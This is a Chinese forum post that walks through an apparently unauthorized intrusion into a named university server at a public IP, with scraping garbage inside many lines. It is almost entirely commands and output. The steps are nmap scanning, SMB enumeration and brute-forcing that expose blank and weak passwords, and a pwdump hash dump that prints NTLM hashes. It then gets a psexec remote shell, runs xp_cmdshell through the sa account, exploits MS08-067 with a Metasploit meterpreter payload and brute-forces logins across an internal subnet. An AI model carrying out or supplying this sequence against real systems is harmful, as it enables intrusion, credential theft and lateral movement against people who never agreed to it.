中国网络渗透测试联盟

标题: nmap+msf入侵广西师范 [打印本页]

作者: admin    时间: 2012-12-4 12:46
标题: nmap+msf入侵广西师范
广西师范网站http://202.103.242.241/- U& b6 e, z0 Z* j

! E1 b2 \+ h* a; Yroot@bt:~# nmap -sS -sV 202.103.242.241
- P' z2 `6 B, x# H2 |; }+ u& h+ m
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
' R: o& S0 a1 c( L0 M
# _0 k2 b. u; l1 x# I' QNmap scan report for bogon (202.103.242.241)" \7 I# T3 K( w

* P( s8 e% L8 f& PHost is up (0.00048s latency).
. w5 H6 h: g' Y. w/ A+ Y, O
& `- \' s( p  r. jNot shown: 993 closed ports
, Q- }6 |2 W1 b; v1 j  {
: E- L. e" w0 }: t$ cPORT     STATE SERVICE       VERSION
% o' n0 i& k% I6 n
7 a! v4 Z, Q6 x- t135/tcp  open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
% z9 b6 ]; v; C7 n1 a
$ P. Q  S( ^1 O4 A1 @% v139/tcp  open  netbios-ssn9 d# ^5 c8 o1 X# T" b7 i; ?. }

! X! s6 p" e. y  \; H1 t445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
' \! h; B, y4 {2 ^1 m* `5 B4 ?: ?: {- h" v  H* H8 V  o. M9 }
1025/tcp open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)& V1 r$ Q$ i+ R' b

# q' p' O  b2 [$ B' B1026/tcp open  msrpc         Microsoft Windows RPC
; `. V9 y! a. H* `2 E1 @  W/ m/ |' c
3372/tcp open  msdtc?
" n6 z4 t/ s& N9 V4 }" t' Y& s  V; }. m. @0 L
3389/tcp open  ms-term-serv?4 ~9 ]( s; {4 [4 }) ~7 [9 S4 m

+ ~2 a( c# I, u1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
& [  V# i6 s  E: V: P' ]& G& ~9 J! `$ USF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r+ s; j% z8 w( ?$ Q5 R
* c  _- Y" Y0 _
SFGetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
4 s2 |  F/ _( X9 t1 X+ V. [' B
: q; R6 w! Z3 ?SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
* C# D: h8 I; J+ R+ \/ m, A9 w2 [, H+ o- f2 O9 a& x
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
- n6 ~" ?0 J- f1 [. l! o
7 }6 @# L* L7 q4 ySF:ptions,6,”hO\n\x000Z”);
7 x& t3 X  P3 v. D6 Q4 S! I4 i" g
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
* ?* {8 f4 e4 M1 K& B
' }1 }9 b0 C% X; J$ d' l" H/ AService Info: OS: Windows& i+ P. e" p; u, `# V7 [1 \
. R; e9 |2 ^/ o) _/ D* k7 B
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .0 s6 ^6 f4 o5 j$ p% K
0 K" G! O5 @! a$ }* x' h3 r( \
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
: b$ g6 |4 W% T
. Q' V/ C: o/ O1 |root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  //列出扫描脚本+ m2 b( |7 I1 ?
6 a! P7 q0 M; [5 y
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
* {' m/ r# \; Q
( [1 c- `4 R4 P- K-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse4 g. |' t, q7 ~- @- v+ [) G. f# o% ~
% x$ C! w3 v: u; t6 C/ u$ X6 R8 {3 r
-rw-r–r– 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse7 P: o& \" A2 v! V7 C. q

7 |# B( l  `. i$ l-rw-r–r– 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse$ m" G  f7 n, j3 c5 B
1 ]: X( h) x  a. |
-rw-r–r– 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse6 B- ~0 {0 J  _, z: o3 j
) @; v* t9 O5 U! Z4 ~. J5 @
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
, z7 v8 w9 k" l# H3 z, x9 Q' k) ^" t# S6 v
-rw-r–r– 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
2 K: a9 |. C7 c* e! r# d: f* t2 j% h' P7 \( y9 y
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
1 a5 t; {) F* e' m4 i
) L' U* U) c9 g" D8 K' ^-rw-r–r– 1 root root  1658 2011-07-09 07:36 smb-flood.nse# V, N  g7 h9 T& E8 }( {8 \
5 o2 A# J  M) Q' N2 a2 r3 o6 ~
-rw-r–r– 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse9 k6 N  o( U9 s" m/ h7 M8 @0 d  v* ~3 T

1 J/ x0 b! A9 Q# W-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse' V0 C3 d5 U& L  r

4 k7 j9 ~8 G) G5 Q- Y  H0 h  }-rw-r–r– 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse3 ?; [7 U( X2 g- _5 [
, j' _3 y, z, ^$ t# r. Z
-rw-r–r– 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
; ^$ I4 L" `6 d0 f0 h9 w2 n8 V$ g
* C  z3 p, V4 B-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
# ]) o3 o+ {# l9 g" p' |; R  l! v
-rw-r–r– 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse2 ?4 b. r/ P1 L0 M/ X

0 }" x+ a* Q, |root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241   
, z6 q" l) R% `8 H
8 G0 X- l% [% ]) p. f, W/ i//此乃使用脚本扫描远程机器所存在的账户名
* `5 |( f9 n  K7 X: K. x; b6 T
# z$ B- d/ U5 U* m7 @Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
+ t- y; G! Z/ ~3 ]1 G( q
$ w4 _1 r# m. b" X+ C( e+ W/ wNmap scan report for bogon (202.103.242.241)/ ?6 S- N4 C2 Y7 v0 n( y- \$ Z

7 P' h8 G0 i1 }: gHost is up (0.00038s latency).
( ^4 `4 }- F& U6 _; M: ~
( v/ \( l' i7 o6 D, q. M# {Not shown: 993 closed ports
" ]+ K, i' U, ~  X* R& U$ H! ^+ j+ T$ `. j/ z
PORT     STATE SERVICE: p5 C; N4 n$ B# I8 X  t
% n9 u( i5 I0 Z! m, K  o
135/tcp  open  msrpc; }6 q! v* u2 q

1 m' Z+ n3 a  p. Y139/tcp  open  netbios-ssn
, g3 }% Y0 @  s0 @  U
$ i/ C9 s7 a, C5 U8 R) B) h4 m445/tcp  open  microsoft-ds( J$ U6 [' d) O" _2 Q% M' i

( q/ D: u! j. `; f* w1025/tcp open  NFS-or-IIS
6 P, W2 K" e1 V
0 Z+ J" s% a' e! P. D1026/tcp open  LSA-or-nterm2 x0 G, G' K, {$ m$ U
0 R1 l3 P8 E$ w1 \+ y, |! Y
3372/tcp open  msdtc4 v! |5 ^1 h. g3 {# s2 ?/ X- N

0 y+ c* _3 X4 ^* i3389/tcp open  ms-term-serv
: l2 Q% t& r( r8 z. G7 x
  L. m( s/ G& K8 y& q0 L4 YMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)2 J! ~: o. U9 [, H) A
/ v9 J& E1 ^0 y0 Q
Host script results:
) j9 O4 X3 {' v( X
' J& T8 p& J4 K( Y| smb-enum-users:
! y  h7 K3 M7 ]+ Q
% j/ d6 V( @, q" N9 J' h|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
7 [* U/ Y) i. G8 X4 N' @* V5 K& N5 T! m2 i+ ?- W. N% T. v
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
: f4 @7 P# l& E; e" H" X; y9 e# k6 g' h- G8 S
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
" y6 G4 G  M; }& S  H8 U, L  Y; k7 ^5 N( g5 t
//查看共享
6 @( ]$ j$ `# c9 ~% p( q. t3 E' {  V! b( |% M; z* B$ H
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
0 s' |+ ^* W0 S3 @3 N
5 v4 B7 i" u0 O. X. @& W0 ZNmap scan report for bogon (202.103.242.241)# {& h8 K* z2 X& U4 g

+ P9 L; @7 Q1 Y6 W" nHost is up (0.00035s latency).
6 Y+ y8 O/ R+ X2 \% q" T& O" q3 ^. Y2 W4 `) c( Y' F: K
Not shown: 993 closed ports
9 W+ D' q9 c& e0 Y$ r
$ J- U: @* q0 ^) v; IPORT     STATE SERVICE
7 L( K$ b' r: v% ]& P0 A( l. M/ i7 V3 M; y: M/ q2 [  R7 M
135/tcp  open  msrpc
/ O5 I( Z& [# N, G8 x7 I+ M2 K2 u3 q
, Q% K$ N4 ?+ y# ?139/tcp  open  netbios-ssn
2 Z" w3 r9 R2 S$ j$ I: [/ i' Q+ X: [7 |$ h
445/tcp  open  microsoft-ds
# x1 e" J! y! @& w6 [( n' V% i+ S7 r
) A& Y- S, q0 |1025/tcp open  NFS-or-IIS
8 ]1 ?' w" |  A
! ~7 V, W( ~  y' u; s! Y1026/tcp open  LSA-or-nterm/ d! r( j3 {+ P/ S# q
9 ^; ?% }5 x8 j! z
3372/tcp open  msdtc- b7 H( @9 \1 C* @3 g* z" I

) ^' v7 H$ j/ W+ o' Y4 ~3389/tcp open  ms-term-serv
3 r6 U9 D9 ^9 \- K% n7 @* J/ o: j  s* C! U- s6 Q) C2 K
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems), F! \, o# c% J% B

6 D. X3 @" |  JHost script results:
! {+ z0 s' _  a; ]9 o* u+ D
/ k) o* j. Q9 r/ p| smb-enum-shares:* B' K% x5 ~3 L

! a0 x2 V7 H6 z, F: P- l' H) U|   ADMIN$5 c# G4 Z! u# T9 z/ k

4 Q! C/ F# U6 u6 `% b|     Anonymous access: <none>8 B+ U9 ]; K; l. k* ?6 U
7 V) ]- R: X8 [2 e0 O2 J6 j
|   C$
! L2 l5 d% o. i. [! |; c: U! T
6 }" j: g' a$ R3 N; b$ j|     Anonymous access: <none>; x6 Q/ z: ?2 w5 u" F1 m$ r! x( F
" n7 i4 H: S1 n& l6 l3 B& F
|   IPC$; {) e2 e  [8 k. t7 e* u/ ^, C6 ]

3 [& s. b3 [: n4 M# R/ H|_    Anonymous access: READ5 R6 M: G* c4 d. y0 l; n
$ x3 x- X: a( {5 i
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
* ~3 v" Q6 h8 i1 W& o
/ A& J) v0 O0 \8 hroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241      
! a% e* X' g' a; L6 Y. e
2 L5 ?; }, T- [1 m. D1 l//获取用户密码, O; [4 |. E5 r" s/ U
3 g9 K& E% A0 M+ A5 F8 s3 e& ~8 @  a
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST) e# R8 E) C3 j7 F7 F) k6 K

! D: m+ x+ r: R* FNmap scan report for bogon (202.103.242.2418), ~; G2 h# K0 H" T; r

! p: |9 o6 u8 h+ G  J/ L! ^Host is up (0.00041s latency).
* r4 r, v3 l# [' D0 j- |9 @% m, I% O; D$ y& ^' _
Not shown: 993 closed ports: m+ C; i; i: L' f# C9 g

9 P8 z. w  n7 v: R* W% qPORT     STATE SERVICE$ x2 y; |# Q+ w8 K# G8 R) G8 N

" H$ n6 `* L. n! M' Z. x+ c7 m135/tcp  open  msrpc+ I* G' q2 d  h/ u1 m
& r; G0 O, ^7 Y4 D8 \% M8 O7 x1 U
139/tcp  open  netbios-ssn# K. Y0 }* R- \
  U7 Z" |2 J- w; t7 \7 K
445/tcp  open  microsoft-ds: m$ Y/ Z1 \+ {. ?& B6 m

1 o# r* V- i$ j) ~6 L. V" G, f3 U1025/tcp open  NFS-or-IIS! a: z) Y+ y4 B! A2 Q

' S' T! p* f% j4 C& z! c1026/tcp open  LSA-or-nterm
+ ^( j* w( B% d( ]' j, C$ I8 e8 l4 o) C) P6 P; u
3372/tcp open  msdtc
3 m- F0 z# _" f3 I1 t+ }, f. X. U# g: A% L
3389/tcp open  ms-term-serv& w5 Z/ S. k; m" O" H
+ ]" Z/ l: z) U* n6 f* c( k: ?
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
! k4 {/ ?% v6 x/ a" w
' A3 r3 a. ^! @# KHost script results:
) _" Q# X1 B- f+ q# g# F! F$ \  m7 i2 {( K- b
| smb-brute:  l# q# z& Q# f0 h$ r

: t7 V( T9 x8 \, ladministrator:<blank> => Login was successful
5 m' B4 R1 G/ @' a1 P9 x1 v/ e; U3 E( v. X7 U
|_  test:123456 => Login was successful
! k- K( l$ Q+ b" ~$ f3 [  |- i' q
) R$ y4 V% |& T$ c  j, M) x  [# i+ w$ WNmap done: 1 IP address (1 host up) scanned in 28.22 seconds
0 U2 `! R2 u3 p( Y2 H! N1 S" _3 p) N# k
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
5 M8 a7 }* S' F  U1 Q6 T1 Y5 i9 L0 d6 n* t
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
- |6 O- h0 s$ n/ Y- R, l& _: l! V$ ~# ~. F- w
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse+ d) E! w; t% D

' C; I- _! N& @8 ^6 ?  groot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
7 N9 u1 Q4 B8 i2 U( F9 r9 }+ [$ O
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST8 E; J6 [- ^2 v( d' d
1 {, c5 M; G* V' h, A: |" {
Nmap scan report for bogon (202.103.242.241)
1 h0 ^7 T$ P9 {3 r. X6 m+ q
  T" R  `7 }  u, F+ r( @2 t/ uHost is up (0.0012s latency).
; U. {% A' _' a6 [# n5 x: F- y- d" y% S% J* _; m
PORT    STATE SERVICE2 W4 |5 P; X: n: P* M* u

% S2 W. U* B" L/ o9 G) ~* |135/tcp open  msrpc
. n8 y8 v! v& n" P/ o) J: [
- T- E3 _! |* K4 a9 N& m0 n) s% u139/tcp open  netbios-ssn* m& y, f8 J- I0 K3 u* {4 [
8 v( J: k& W; z" u% s* M
445/tcp open  microsoft-ds7 F; r. ~  |6 B/ {. W

" I9 H0 b! u% }" HMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
" B# z0 V& \) a, J" e- x6 E; M9 Q
- ?& j" f# m( dHost script results:
% B. A" x  O" v/ T* s: V6 m* a; ^
| smb-pwdump:
. ]7 z1 _" D  t& i; p6 ]% u: g& @  _3 d+ c. I9 ~" h
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************; _$ z$ _) H; G# g

4 @3 ^' `# `7 p' W# H' g( F" A6 t| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
1 e# g) L, Q" K& A; k' {( ~. r' V7 s- [: W
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
, B' M4 }! ]) p, }, @6 T# V  V$ t% f
& ^8 A; Q' c# x1 c4 A7 T. y|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2* U1 D- c. H8 E- W5 v# ^) W

5 P* i# X$ ^9 B& g' j: @Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
! T: a0 N" {8 {5 V" H! R9 k( \! h
: H) o# b; \( O$ t- x' y- qC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241  -u test             //获取一个cmdshell# h% \9 G( i0 L% y# i
: w$ `- V( D0 N% s2 N
-p 123456 -e cmd.exe
" K0 C4 l$ v5 g! v- V2 f% z  @9 n$ k3 B6 _" d- E; h
PsExec v1.55 – Execute processes remotely
; ?3 V! i2 {5 h( E" s) r
, l4 J0 L3 g; [" Z# jCopyright (C) 2001-2004 Mark Russinovich6 w. ~. t2 C$ D2 S+ _

2 ~* x, l- ?. G* H+ PSysinternals – www.sysinternals.com
# j$ s( P4 M! F( v0 z2 y% L% s  q( @$ {
Microsoft Windows 2000 [Version 5.00.2195]
# ^# P2 X# ~( G8 k% K" @/ f& a; o6 j% m# i& D! a3 V0 b2 v8 e
(C) 版权所有 1985-2000 Microsoft Corp.9 r- f' L  R0 x& @2 E6 ~+ S
; v, h0 h" l, q; i: ^3 z
C:\WINNT\system32>ipconfig
( i, {7 Q8 ~8 c' j* c; a) B4 G. l2 e" c0 A( E2 |
Windows 2000 IP Configuration" \( e+ K1 `3 `( s$ T% ?' I& p2 H
1 [2 f+ K; W3 k$ }6 g  R
Ethernet adapter 本地连接:
3 x7 k6 A: S1 C* O% L" D; X1 E# E3 d# ]9 [; \& z
Connection-specific DNS Suffix  . :
7 }: L( \. K2 V; H( u1 l# u$ n! a) O: U+ A/ e2 t8 o# i9 t& x; A
IP Address. . . . . . . . . . . . : 202.103.242.241
" r6 P# E3 E: j* v. x
* i# `6 N4 x& L1 Z% W6 m, QSubnet Mask . . . . . . . . . . . : 255.255.255.0
7 s( D. K7 y) I
' X5 P* b: o$ v% vDefault Gateway . . . . . . . . . : 202.103.1.1
; h4 }' v& Y: c1 Z6 P. c) T6 c
+ e4 d1 c( d& t1 OC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “   //远程登录sa执行命令: I- X( `  A! X9 T6 x' o4 Q
. Q- V6 B$ B. I
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241     //检测目标机器漏洞
1 ^3 _* \* o, b1 m, s
! ?) o+ V& p5 Q3 V# qStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST9 F- e1 C! b) d3 `! x
& k) e) v& _0 L; x/ s- e4 k
Nmap scan report for bogon (202.103.242.241)' O+ A) b) c5 N) c2 w: t

$ N5 d9 c. Z9 y% A  u4 e% ?  fHost is up (0.00046s latency).
) H3 O. v- F, X5 |. c
1 P$ d) `# v5 j& aNot shown: 993 closed ports
# C8 O3 h/ M7 R6 y" Z9 c% Z. c. M/ V6 w6 S3 ^" u( C
PORT     STATE SERVICE0 ~, \) h$ d4 e' Y! a9 A! Q0 Q5 E1 N

5 U/ Q- i. l& s0 p6 ^% H! ^135/tcp  open  msrpc/ @; W' y/ q. N* F' Q
6 T+ _# n( Y% u  H) j( Z
139/tcp  open  netbios-ssn# p8 H  u5 Y2 [
* c6 Z8 c' q& c( Y  [' g7 P# }
445/tcp  open  microsoft-ds
9 i( \9 j$ A3 D  M+ R9 B' P- i' ~$ J5 ^4 B0 J% V) X7 H8 D7 _5 S
1025/tcp open  NFS-or-IIS( z5 V) Y. R$ R5 g+ F
, v; G6 g: M% {
1026/tcp open  LSA-or-nterm
) g2 j6 G) g, l' s3 d& y6 O* b8 d& `
: D6 ]- ]8 [5 x" H6 f* e" L3372/tcp open  msdtc6 ^; ^; P0 a, g& s8 b+ h" h' ^
; Z7 z$ j3 d; i% B
3389/tcp open  ms-term-serv* X4 M1 ]6 l' m
  q; ^- @: w$ h6 `6 g3 u
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
5 ]6 Y: e2 @/ |2 ?/ `
" B( a* M# H7 b6 A# e* N0 w5 DHost script results:
6 D3 {+ Y5 [' j/ t8 j; R8 P+ a
# R  v7 @$ {8 a! j% ]* ?| smb-check-vulns:
3 D) W* M: B1 g' y1 s' u  c4 h
: x! w* ]  C; M+ B( g4 Q5 y|_  MS08-067: VULNERABLE
  ~! s+ k6 X% w1 ^# h& B1 a3 j
* w% K$ n1 v* ^6 X+ |( cNmap done: 1 IP address (1 host up) scanned in 1.43 seconds$ R& o$ |; W1 L3 w9 V  v  {7 _) _

" s0 z9 c" P/ V9 F  }0 Droot@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出, r9 U; ?% D( S/ g

$ w  F( `8 v9 V% R- ]  ?- w9 }msf > search ms08
  ?! i3 `3 e$ p6 _8 p8 W) v' q. }
& _& _1 t$ f) I* J. Y; w2 lmsf > use exploit/windows/smb/ms08_067_netapi
* p7 D- s( w" g/ X2 |) E9 @
1 f' P8 o# M# F/ zmsf  exploit(ms08_067_netapi) > show options* t; _$ A! E3 {3 @7 N7 ?/ e9 ^

/ i  P$ h& N: Z+ x- t( b8 ~+ pmsf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
% ?! ~5 o( f) Q# h, x8 l% @, C. A* r6 S1 p/ v) z" a
msf  exploit(ms08_067_netapi) > show payloads6 J/ A5 y: O5 l

( d+ H. G- m5 c5 E0 }: p* lmsf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp0 R" n5 q: l" o  r

  T+ Y  J; B; D6 y; x) r! fmsf  exploit(ms08_067_netapi) > exploit) R" o& p7 w# y) ~; K8 P

, F7 H1 w* [9 ^  d; Xmeterpreter >6 D- d9 `6 o# j" ?( \* ]5 V
9 _- W/ e2 F# _( s
Background session 2? [y/N]  (ctrl+z)
1 \7 D3 e8 N- {) _
! h- s2 g. S+ h1 Y" O: Zmsf  exploit(ms08_067_netapi) > sessions -l
0 l' G+ U* U2 g- f
8 }6 Q- g) _1 b" ^$ {0 wroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt) j- H4 P( A* w# V

. R" m; @2 }* t, ntest* f6 Z: U5 t  a8 B( M* I5 H  @. ~
$ n8 R1 G4 X( S- Q% c
administrator
' e. \) N0 N% v
. [9 r' j+ J4 I. U2 `  Q9 Droot@bt:/usr/local/share/nmap/scripts# vim password.txt9 q' q) W, [' h9 q
. P2 u. W+ K6 e/ z' [
44EFCE164AB921CAAAD3B435B51404EE
$ V3 N: F8 s; `  j2 F0 u. h) a/ O- |, n
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 + b5 c1 e# E! u" Y

& W+ Y6 c; k( _ //利用用户名跟获取的hash尝试对整段内网进行登录
* h2 ^9 u6 i# n9 y! U' L1 f
4 Q3 \: m# R$ x* x$ nNmap scan report for 192.168.1.105; |+ U8 q6 n2 d, w2 s

% g0 y; k$ g- D5 E& ?3 mHost is up (0.00088s latency).: I6 f: v8 h0 I9 k
; }& q4 O- {) I, g3 L7 }
Not shown: 993 closed ports
4 ^/ J& m7 D4 q0 v% Y
6 ?! t$ x3 s$ ]; nPORT     STATE SERVICE4 ~- W/ `% U9 Z' D( U

7 f" H* C; u0 b- [) T) H/ o135/tcp  open  msrpc
+ L4 f' u2 N+ y4 `+ ]$ ]- {( A$ Q  c: _/ Q
139/tcp  open  netbios-ssn
0 s& E' t9 \* M, t6 X: B& b, F/ E+ B# u8 h) E7 |0 x7 N
445/tcp  open  microsoft-ds& `: x( q' A9 r' h

% g7 h$ y, q/ d; z# [1025/tcp open  NFS-or-IIS1 S& F: U6 z1 |4 v4 v9 {) S

$ X6 C& |' ^5 w' X8 d: z/ M1026/tcp open  LSA-or-nterm
5 u0 r! N* s, r- `0 f0 D1 R! O- o# {" l& D( t, Z
3372/tcp open  msdtc, Q# u8 I' g, u/ m+ x
8 y# \8 V- V8 H4 e; W2 T
3389/tcp open  ms-term-serv
' ^! R1 N9 H- [( ?7 e* w5 d* ]& x# P. S7 k- J2 h3 P! b
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
' q: y& ?; [; f# Z7 s. b' Q' e1 D1 ~9 u: @, Q1 ?; o
Host script results:+ _+ p1 Y" H8 e  Z' @2 v- Z( h/ ^) U

3 z! P1 t- ?% S$ \# J| smb-brute:- [6 Q! k6 I0 [5 I; @
% X/ z/ G1 \- i+ J4 N- Y
|_  administrator:<blank> => Login was successful9 u2 l  h; I( d, \( r1 |* v
/ V" @' k$ K: Q8 C5 z( m
攻击成功,一个简单的msf+nmap攻击~~·+ b/ |7 \$ m) L5 Y

& b& l8 A& @: j8 m




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2